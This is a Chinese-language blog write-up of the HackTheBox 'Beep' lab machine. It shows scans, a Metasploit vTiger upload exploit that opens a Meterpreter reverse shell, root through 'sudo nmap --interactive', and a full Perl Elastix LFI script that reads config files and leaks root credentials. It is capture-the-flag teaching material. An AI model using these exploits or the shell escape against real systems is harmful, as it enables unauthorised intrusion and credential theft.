文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-04-07   2.5k

HTB::Beep Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • sslscan
  • wfuzz
  • vtigercrm
  • LFI
  • Elastix / FreeFBX
  • Nmap Privilege Escalation

0x03 Pentesting

Initial Enumeration

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Nmap 7.80 scan initiated Tue Apr  7 03:18:33 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.25s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: TOP APOP UIDL IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) STLS RESP-CODES AUTH-RESP-CODE USER EXPIRE(NEVER) PIPELINING
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: THREAD=REFERENCES ATOMIC Completed MAILBOX-REFERRALS OK RENAME LISTEXT LITERAL+ MULTIAPPEND X-NETSCAPE LIST-SUBSCRIBED CHILDREN UNSELECT RIGHTS=kxte URLAUTHA0001 IDLE IMAP4rev1 SORT=MODSEQ ID BINARY IMAP4 CONDSTORE CATENATE SORT ANNOTATEMORE NO UIDPLUS STARTTLS ACL NAMESPACE THREAD=ORDEREDSUBJECT QUOTA
443/tcp open ssl/https?
|_ssl-date: 2020-04-07T07:23:36+00:00; +1m25s from scanner time.
880/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 7 03:24:47 2020 -- 1 IP address (1 host up) scanned in 374.24 seconds

SSL scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# kali @ kali in ~/HackTheBox/Beep [4:37:19] C:127
$ sslscan 10.10.10.7
Version: 2.0.0-static
OpenSSL 1.1.1f-dev xx XXX xxxx

Connected to 10.10.10.7
Testing SSL server 10.10.10.7 on port 443 using SNI name 10.10.10.7

SSL/TLS Protocols:
SSLv2 disabled
SSLv3 enabled
TLSv1.0 enabled
TLSv1.1 disabled
TLSv1.2 disabled
TLSv1.3 disabled

TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

TLS renegotiation:
Secure session renegotiation supported

TLS Compression:
Compression enabled (CRIME)

Heartbleed:
TLSv1.0 not vulnerable to heartbleed

Supported Server Cipher(s):
Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
Accepted TLSv1.0 112 bits DHE-RSA-DES-CBC3-SHA DHE 1024 bits
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 128 bits RC4-SHA

Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 56 bits TLS_RSA_WITH_DES_CBC_SHA
Accepted TLSv1.0 56 bits TLS_DHE_RSA_WITH_DES_CBC_SHA

Server Signature Algorithm(s):
TLSv1.0 Server accepts all signature algorithms.

SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 1024

Subject: localhost.localdomain
Issuer: localhost.localdomain

Not valid before: Apr 7 08:22:08 2017 GMT
Not valid after: Apr 7 08:22:08 2018 GMT

wfuzz扫描目录

Getting User Access

寻找vtigercrm v5.1.0的漏洞

尝试``vtiger_php_exec不行再换vtiger_soap_upload`,可以反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
msf5 exploit(multi/http/vtiger_php_exec) > use exploit/multi/http/vtiger_soap_upload
msf5 exploit(multi/http/vtiger_soap_upload) > show options

Module options (exploit/multi/http/vtiger_soap_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /vtigercrm/ yes Base vTiger CRM directory path
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 vTigerCRM v5.4.0


msf5 exploit(multi/http/vtiger_soap_upload) > set RHOSTS 10.10.10.7
RHOSTS => 10.10.10.7
msf5 exploit(multi/http/vtiger_soap_upload) > set RPORT 443
RPORT => 443
msf5 exploit(multi/http/vtiger_soap_upload) > set SSL true
SSL => true
msf5 exploit(multi/http/vtiger_soap_upload) > set LHOST 10.10.14.5
LHOST => 10.10.14.5

msf5 exploit(multi/http/vtiger_soap_upload) > check
[+] 10.10.10.7:443 - The target is vulnerable.
msf5 exploit(multi/http/vtiger_soap_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Uploading payload...
[+] Upload successfully uploaded
[*] Executing payload...
[*] Sending stage (38288 bytes) to 10.10.10.7
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.7:43989) at 2020-04-07 10:50:50 -0400
[!] This exploit may require manual cleanup of 'bPRojImibS.php' on the target

meterpreter >
[+] Deleted bPRojImibS.php
shell
Process 8916 created.
Channel 0 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)

获取user flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
python -c "import pty;pty.spawn('/bin/sh')"   
sh-3.2$ id
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh-3.2$ pwd
pwd
/var/www/html/vtigercrm
sh-3.2$ cd /home/fanis
cd /home/fanis
sh-3.2$ ls -la
ls -la
total 32
drwxrwxr-x 2 fanis fanis 4096 Apr 7 2017 .
drwxr-xr-x 4 root root 4096 Apr 7 2017 ..
-rw------- 1 fanis fanis 114 Apr 7 2017 .bash_history
-rw-r--r-- 1 fanis fanis 33 Apr 7 2017 .bash_logout
-rw-r--r-- 1 fanis fanis 176 Apr 7 2017 .bash_profile
-rw-r--r-- 1 fanis fanis 124 Apr 7 2017 .bashrc
-rw-rw-r-- 1 fanis fanis 33 Apr 7 2017 user.txt
sh-3.2$ cat user.txt
cat user.txt
aeff3def0c765c2677b94715cffa73ac

Getting Root Access

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
sh-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"

User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper

命中Nmap,以root权限执行且无需认证

较早版本的Nmap(2.02至5.21)具有交互模式,该模式允许用户执行Shell命令由于Nmap在以root特权执行的二进制文件列表中,因此可以使用交互式控制台来以相同的特权运行shell

1
2
3
4
5
6
7
8
9
10
11
12
13
sh-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2# cat /root/root.txt
cat /root/root.txt
d88e006123842106982acce0aaf453f0

Another Way

重点关注几个常见服务 22(ssh)、80(apache)、443(https)、3306(mysql)、10000(httpd),访问 https://10.10.10.7:443 ,返回登录页面:

使用默认登录密码:username: admin password: palosanto,登录错误。

searchsploit找一下相关漏洞:

尝试本地包含漏洞,因为靶机上的SSL证书过期了,所以要修改一下利用脚本:

https://stackoverflow.com/questions/336575/can-i-force-lwpuseragent-to-accept-an-expired-ssl-certificate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/perl -w
#------------------------------------------------------------------------------------#Elastix is an Open Source Sofware to establish Unified Communications. #About this concept, Elastix goal is to incorporate all the communication alternatives, #available at an enterprise level, into a unique solution. #------------------------------------------------------------------------------------############################################################ # Exploit Title: Elastix 2.2.0 LFI # Google Dork: :( # Author: cheki # Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;)
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki \n";
print "\t 0day Elastix 2.2.0 \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";
$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->ssl_opts(verify_hostname => 0, SSL_verify_mode => 0x00);
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {

print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";

}
else {
print "\n[-] not successful\n";
}

从之前 sslscan 的扫描结果我们看到靶机只支持 TLSv1.0,因此我们需要修改 Kali 的openssl配置文件

1
2
3
4
5
6
[system_default_sect]
#MinProtocol = TLSv1.2
#CipherString = [email protected]=2

MinProtocol = TLSv1.0
CipherString = DEFAUT

再执行利用脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# kali @ kali in ~/HackTheBox/Beep [5:15:57]
$ perl 37637.pl > elastix
# kali @ kali in ~/HackTheBox/Beep [5:16:34]
$ cat elastix
...
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
...

利用payload直接在网页上查看/etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.

使用fanis : jEhdIekWmdjE登录靶机发现密码错误,再一看Writeup,直接是可以root登录…orz==

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# kali @ kali in ~/HackTheBox/Beep [9:19:31] 
$ ssh [email protected]
[email protected]'s password:
Last login: Tue Apr 7 16:20:42 2020 from 10.10.14.5

Welcome to Elastix
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[[email protected] ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[[email protected] ~]# cat /root/root.txt
d88e006123842106982acce0aaf453f0
[[email protected] ~]# cat /home/fanis/user.txt
aeff3def0c765c2677b94715cffa73ac
Copyright © ca01h 2019-2020 | 本站总访问量